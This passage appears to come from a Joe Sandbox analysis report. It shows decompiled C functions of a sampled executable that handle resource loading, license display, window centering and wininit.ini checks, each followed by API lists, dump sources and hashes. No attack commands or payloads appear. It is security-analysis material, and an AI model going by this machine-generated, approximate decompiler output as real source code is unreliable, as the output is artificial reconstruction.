                                                                                                                                                                                                                                            										_t87 = _v20;
                                                                                                                                                                                                                                            										_t106 = 0;
                                                                                                                                                                                                                                            										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                                                            											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                                                            												GlobalUnlock(_t103);
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												goto L15;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L15;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L20;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				L20:
                                                                                                                                                                                                                                            				 *_a8 = _t87;
                                                                                                                                                                                                                                            				if(_t103 != 0) {
                                                                                                                                                                                                                                            					GlobalFree(_t103);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t106;
                                                                                                                                                                                                                                            			}


































                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 00322A6F
                                                                                                                                                                                                                                              • Part of subcall function 00322773: CharUpperA.USER32(2C4B51C8,00000000,00000000,00000000), ref: 003227A8
                                                                                                                                                                                                                                              • Part of subcall function 00322773: CharNextA.USER32(0000054D), ref: 003227B5
                                                                                                                                                                                                                                              • Part of subcall function 00322773: CharNextA.USER32(00000000), ref: 003227BC
                                                                                                                                                                                                                                              • Part of subcall function 00322773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00322829
                                                                                                                                                                                                                                              • Part of subcall function 00322773: RegQueryValueExA.ADVAPI32(?,00321140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00322852
                                                                                                                                                                                                                                              • Part of subcall function 00322773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00322870
                                                                                                                                                                                                                                              • Part of subcall function 00322773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003228A0
                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00323938,?,?,?,?,-00000005), ref: 00322958
                                                                                                                                                                                                                                            • GlobalLock.KERNEL32 ref: 00322969
                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00323938,?,?,?,?,-00000005,?), ref: 00322A21
                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00323938,?,?), ref: 00322A81
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                                                            • String ID: 892
                                                                                                                                                                                                                                            • API String ID: 3949799724-325759232
                                                                                                                                                                                                                                            • Opcode ID: 6d3cc126628ee8586a9a6b73294fd961e740daf1dd87a547cc4eb805531bf895
                                                                                                                                                                                                                                            • Instruction ID: 4fe09b110648122b3a19516c3b58b8cbdbf4c815ab8e81ee816af1d46a563b3f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6d3cc126628ee8586a9a6b73294fd961e740daf1dd87a547cc4eb805531bf895
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17512B31D00229EFCB22DF98EC85AAEBBB9FF48700F15412AE905E7611DB319941DB91
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                                            			E003243D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				struct tagRECT _v24;
                                                                                                                                                                                                                                            				struct tagRECT _v40;
                                                                                                                                                                                                                                            				struct HWND__* _v44;
                                                                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                                                                            				int _v52;
                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                            				int _v60;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                                            				void* _t53;
                                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                                            				int _t59;
                                                                                                                                                                                                                                            				struct HWND__* _t63;
                                                                                                                                                                                                                                            				struct HWND__* _t67;
                                                                                                                                                                                                                                            				struct HWND__* _t68;
                                                                                                                                                                                                                                            				struct HDC__* _t69;
                                                                                                                                                                                                                                            				int _t72;
                                                                                                                                                                                                                                            				signed int _t74;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t63 = __edx;
                                                                                                                                                                                                                                            				_t29 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                                                            				_t68 = __edx;
                                                                                                                                                                                                                                            				_v44 = __ecx;
                                                                                                                                                                                                                                            				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                                                            				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                                                            				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                                                            				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                                                            				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                                                            				_t69 = GetDC(_v44);
                                                                                                                                                                                                                                            				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                                                            				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                                                            				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                                                            				_t56 = _v48;
                                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                                            				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                                                            				_t67 = 0;
                                                                                                                                                                                                                                            				if(_t72 >= 0) {
                                                                                                                                                                                                                                            					_t63 = _v52;
                                                                                                                                                                                                                                            					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                                                            						_t72 = _t63 - _t56;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t72 = _t67;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                                            				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                                                            				if(_t59 >= 0) {
                                                                                                                                                                                                                                            					_t63 = _v60;
                                                                                                                                                                                                                                            					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                                                            						_t59 = _t63 - _t53;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t59 = _t67;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00326CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                                                            			}

























                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 003243F1
                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 0032440B
                                                                                                                                                                                                                                            • GetDC.USER32(?), ref: 00324423
                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 0032442E
                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0032443A
                                                                                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00324447
                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001), ref: 003244A2
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2212493051-0
                                                                                                                                                                                                                                            • Opcode ID: a79d700a6e61cc9d2b9bfc43e1f1415610f4482d78ed5d4a4a07df37b6b04415
                                                                                                                                                                                                                                            • Instruction ID: 29bb91f11da5985771b48fa29d6f50d1e779896e19907c5d5815cf5e99392a98
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a79d700a6e61cc9d2b9bfc43e1f1415610f4482d78ed5d4a4a07df37b6b04415
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E5315E72E00519AFCB15DFB8ED899EEBBB9EB89310F154169F805F3240DA30AC05CB61
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                                            			E00326298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _v36;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t16;
                                                                                                                                                                                                                                            				struct HRSRC__* _t21;
                                                                                                                                                                                                                                            				intOrPtr _t26;
                                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                            				intOrPtr* _t40;
                                                                                                                                                                                                                                            				void* _t41;
                                                                                                                                                                                                                                            				intOrPtr* _t44;
                                                                                                                                                                                                                                            				intOrPtr* _t45;
                                                                                                                                                                                                                                            				void* _t47;
                                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t51;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t44 = __edx;
                                                                                                                                                                                                                                            				_t16 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                                                            				_t46 = 0;
                                                                                                                                                                                                                                            				_v32 = __ecx;
                                                                                                                                                                                                                                            				_v36 = 0;
                                                                                                                                                                                                                                            				_t36 = 1;
                                                                                                                                                                                                                                            				E0032171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					_t51 = _t51 + 0x10;
                                                                                                                                                                                                                                            					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                                                            					if(_t21 == 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                                                            					if(_t45 == 0) {
                                                                                                                                                                                                                                            						 *0x329124 = 0x80070714;
                                                                                                                                                                                                                                            						_t36 = _t46;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                                                            						_t44 = _t5;
                                                                                                                                                                                                                                            						_t40 = _t44;
                                                                                                                                                                                                                                            						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                                                            						_t47 = _t6;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t26 =  *_t40;
                                                                                                                                                                                                                                            							_t40 = _t40 + 1;
                                                                                                                                                                                                                                            						} while (_t26 != 0);
                                                                                                                                                                                                                                            						_t41 = _t40 - _t47;
                                                                                                                                                                                                                                            						_t46 = _t51;
                                                                                                                                                                                                                                            						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                                                            						 *0x32a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                                                            						_t30 = _v32();
                                                                                                                                                                                                                                            						if(_t51 != _t51) {
                                                                                                                                                                                                                                            							asm("int 0x29");
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_push(_t45);
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							_t36 = 0;
                                                                                                                                                                                                                                            							FreeResource(??);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							FreeResource();
                                                                                                                                                                                                                                            							_v36 = _v36 + 1;
                                                                                                                                                                                                                                            							E0032171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                                                            							_t46 = 0;
                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					return E00326CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L12;
                                                                                                                                                                                                                                            			}






















                                                                                                                                                                                                                                            0x00326314
                                                                                                                                                                                                                                            0x00326314
                                                                                                                                                                                                                                            0x00326316
                                                                                                                                                                                                                                            0x00326319
                                                                                                                                                                                                                                            0x00326355
                                                                                                                                                                                                                                            0x00326357
                                                                                                                                                                                                                                            0x0032631b
                                                                                                                                                                                                                                            0x0032631b
                                                                                                                                                                                                                                            0x00326331
                                                                                                                                                                                                                                            0x00326334
                                                                                                                                                                                                                                            0x00326339
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00326339
                                                                                                                                                                                                                                            0x00326319
                                                                                                                                                                                                                                            0x0032636b
                                                                                                                                                                                                                                            0x0032637d
                                                                                                                                                                                                                                            0x0032637d
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0032171E: _vsnprintf.MSVCRT ref: 00321750
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,003251CA,00000004,00000024,00322F71,?,00000002,00000000), ref: 003262CD
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,003251CA,00000004,00000024,00322F71,?,00000002,00000000), ref: 003262D4
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,003251CA,00000004,00000024,00322F71,?,00000002,00000000), ref: 0032631B
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00326345
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,003251CA,00000004,00000024,00322F71,?,00000002,00000000), ref: 00326357
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                            • String ID: UPDFILE%lu
                                                                                                                                                                                                                                            • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                            • Opcode ID: 854a7312a61c14b9b22c3838fb28d8bb0108003bed7a7cddab438de41700119a
                                                                                                                                                                                                                                            • Instruction ID: efc50f25052dbcbff8695f421c7cf764a34d35d40643f76cd4bae4c0bf616ff2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 854a7312a61c14b9b22c3838fb28d8bb0108003bed7a7cddab438de41700119a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A221F675A00229ABDB22DF64AC469FE7B7CFF48710F114119FA02A3251DB759D028BE0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00323A3F(void* __eflags) {
                                                                                                                                                                                                                                            				void* _t3;
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				CHAR* _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t16 = "LICENSE";
                                                                                                                                                                                                                                            				_t1 = E0032468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                            				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                            				 *0x328d4c = _t3;
                                                                                                                                                                                                                                            				if(_t3 != 0) {
                                                                                                                                                                                                                                            					_t19 = _t16;
                                                                                                                                                                                                                                            					if(E0032468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                                                            						if(lstrcmpA( *0x328d4c, "<None>") == 0) {
                                                                                                                                                                                                                                            							LocalFree( *0x328d4c);
                                                                                                                                                                                                                                            							L9:
                                                                                                                                                                                                                                            							 *0x329124 = 0;
                                                                                                                                                                                                                                            							return 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t9 = E00326517(_t19, 0x7d1, 0, E00323100, 0, 0);
                                                                                                                                                                                                                                            						LocalFree( *0x328d4c);
                                                                                                                                                                                                                                            						if(_t9 != 0) {
                                                                                                                                                                                                                                            							goto L9;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0x329124 = 0x800704c7;
                                                                                                                                                                                                                                            						L2:
                                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					E003244B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					LocalFree( *0x328d4c);
                                                                                                                                                                                                                                            					 *0x329124 = 0x80070714;
                                                                                                                                                                                                                                            					goto L2;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E003244B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            				 *0x329124 = E00326285();
                                                                                                                                                                                                                                            				goto L2;
                                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003246A0
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: SizeofResource.KERNEL32(00000000,00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246A9
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003246C3
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: LoadResource.KERNEL32(00000000,00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246CC
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: LockResource.KERNEL32(00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246D3
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: memcpy_s.MSVCRT ref: 003246E5
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003246EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00322F64,?,00000002,00000000), ref: 00323A5D
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00323AB3
                                                                                                                                                                                                                                              • Part of subcall function 003244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00324518
                                                                                                                                                                                                                                              • Part of subcall function 003244B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00324554
                                                                                                                                                                                                                                              • Part of subcall function 00326285: GetLastError.KERNEL32(00325BBC), ref: 00326285
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(<None>,00000000), ref: 00323AD0
                                                                                                                                                                                                                                            • LocalFree.KERNEL32 ref: 00323B13
                                                                                                                                                                                                                                              • Part of subcall function 00326517: FindResourceA.KERNEL32(00320000,000007D6,00000005), ref: 0032652A
                                                                                                                                                                                                                                              • Part of subcall function 00326517: LoadResource.KERNEL32(00320000,00000000,?,?,00322EE8,00000000,003219E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00326538
                                                                                                                                                                                                                                              • Part of subcall function 00326517: DialogBoxIndirectParamA.USER32(00320000,00000000,00000547,003219E0,00000000), ref: 00326557
                                                                                                                                                                                                                                              • Part of subcall function 00326517: FreeResource.KERNEL32(00000000,?,?,00322EE8,00000000,003219E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00326560
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00323100,00000000,00000000), ref: 00323AF4
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$LICENSE
                                                                                                                                                                                                                                            • API String ID: 2414642746-383193767
                                                                                                                                                                                                                                            • Opcode ID: 24096ab5b9a79449a9c069a3dadb1c5ef0198c3767381c217049065cbdfd0fa9
                                                                                                                                                                                                                                            • Instruction ID: e8bc676467f8779e2f32114533bf980095832ffd1b5553f372b38e84ba54bb1e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 24096ab5b9a79449a9c069a3dadb1c5ef0198c3767381c217049065cbdfd0fa9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2E11D630601221ABD733AF33BC0AF177ABDDBD5700F10483EB946DA1A1DA7998168660
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E003224E0(void* __ebx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t7;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				long _t26;
                                                                                                                                                                                                                                            				signed int _t27;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t20 = __ebx;
                                                                                                                                                                                                                                            				_t7 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                                                            				_t25 = 0x104;
                                                                                                                                                                                                                                            				_t26 = 0;
                                                                                                                                                                                                                                            				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            					E0032658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                                                            					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                                                            					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                                                            					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                            						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                                                            						_lclose(_t25);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00326CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00322506
                                                                                                                                                                                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0032252C
                                                                                                                                                                                                                                            • _lopen.KERNEL32 ref: 0032253B
                                                                                                                                                                                                                                            • _llseek.KERNEL32(00000000,00000000,00000002), ref: 0032254C
                                                                                                                                                                                                                                            • _lclose.KERNEL32(00000000), ref: 00322555
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                            • String ID: wininit.ini
                                                                                                                                                                                                                                            • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                            • Opcode ID: c9f94e86b525a23ac877895a9d6df98488c69aedbabb3ec0ab94768fb45cd4f1
                                                                                                                                                                                                                                            • Instruction ID: cb58c1102e2b50b43875d444c9cb63ae7fbb051cb83bc50df0c395ff4f2336e0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c9f94e86b525a23ac877895a9d6df98488c69aedbabb3ec0ab94768fb45cd4f1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9501B5326015286BC7319B65AC0DEDFBB7CEF46760F004159FA49D3190DE748E46CA91
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

C-Code - Quality: 75%
E003236EE(CHAR* __ecx) {
	signed int _v8;
	char _v268;
	struct _OSVERSIONINFOA _v416;
	signed int _v420;
	signed int _v424;
	CHAR* _v428;
	CHAR* _v432;
	signed int _v436;
	CHAR* _v440;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t72;
	CHAR* _t77;
	CHAR* _t91;
	CHAR* _t94;
	int _t97;
	CHAR* _t98;
	signed char _t99;
	CHAR* _t104;
	signed short _t107;
	signed int _t109;
	short _t113;
	void* _t114;
	signed char _t115;
	short _t119;
	CHAR* _t123;
	CHAR* _t124;
	CHAR* _t129;
	signed int _t131;
	signed int _t132;
	CHAR* _t135;
	CHAR* _t138;
	signed int _t139;

	_t72 =  *0x328004; // 0x2c4b51c8
	_v8 = _t72 ^ _t139;
	_v416.dwOSVersionInfoSize = 0x94;
